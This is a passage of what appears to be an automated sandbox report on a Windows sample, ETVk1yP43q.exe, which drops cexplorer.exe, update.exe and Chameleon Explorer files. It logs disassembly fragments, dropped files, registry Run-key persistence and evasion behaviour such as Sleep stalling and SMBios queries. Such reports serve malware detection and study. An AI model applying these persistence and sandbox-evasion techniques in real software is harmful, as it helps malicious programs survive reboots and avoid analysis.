                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035D9154 push 035D9233h; ret 2_2_035D922B
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035DE150 push ecx; mov dword ptr [esp], edx2_2_035DE151
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035A11DC push ecx; mov dword ptr [esp], edx2_2_035A11DD
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035A2010 push ecx; mov dword ptr [esp], edx2_2_035A2011
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_0359C028 push 0359C07Eh; ret 2_2_0359C076
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035DD0F4 push ecx; mov dword ptr [esp], edx2_2_035DD0F5
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035DB75C push ecx; mov dword ptr [esp], edx2_2_035DB75D
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035DD70C push ecx; mov dword ptr [esp], edx2_2_035DD70D
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035DC724 push ecx; mov dword ptr [esp], edx2_2_035DC725
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035A0794 push ecx; mov dword ptr [esp], edx2_2_035A0795
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_0359F7A8 push ecx; mov dword ptr [esp], edx2_2_0359F7A9
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035A07A4 push ecx; mov dword ptr [esp], edx2_2_035A07A5
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035B061C push 035B067Eh; ret 2_2_035B0676
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035F06F4 push 035F0790h; ret 2_2_035F0788
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035DD518 push ecx; mov dword ptr [esp], edx2_2_035DD519
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035A152C push ecx; mov dword ptr [esp], edx2_2_035A152D
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035F05E4 push 035F062Eh; ret 2_2_035F0626
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035A0420 push ecx; mov dword ptr [esp], ecx2_2_035A0424
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035F04F8 push 035F05AEh; ret 2_2_035F05A6
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035DE4EC push ecx; mov dword ptr [esp], edx2_2_035DE4ED
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_03561B48 push 03561B80h; ret 2_2_03561B78
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035DEB70 push ecx; mov dword ptr [esp], edx2_2_035DEB71
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035DDB30 push ecx; mov dword ptr [esp], edx2_2_035DDB31
                    Source: update.exe.0.drStatic PE information: section name: .text entropy: 7.39308779225367
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-JAVSO.tmpJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backupJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backupJump to dropped file
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeFile created: C:\Users\user\AppData\Local\Temp\aut5826.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Users\user\AppData\Local\Temp\is-N60P6.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-29AV0.tmpJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-OJNBS.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-32DE6.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_new (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeFile created: C:\Users\user\AppData\Roaming\cexplorer.exeJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backupJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder.dllJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-F1F8N.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exeFile created: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_new (copy)Jump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-GJT7J.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy)Jump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backupJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-KSQ9G.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-SCGGO.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeFile created: C:\Users\user\AppData\Roaming\update.exeJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backupJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backupJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backupJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backupJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chameleon FolderJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chameleon ExplorerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chameleon ExplorerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chameleon Explorer\Chameleon Explorer.lnkJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chameleon ExplorerJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chameleon ExplorerJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chameleon FolderJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chameleon FolderJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00417236 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,21_2_00417236
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\AppData\Roaming\update.exeStalling execution: Execution stalls by calling Sleepgraph_3-1556
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
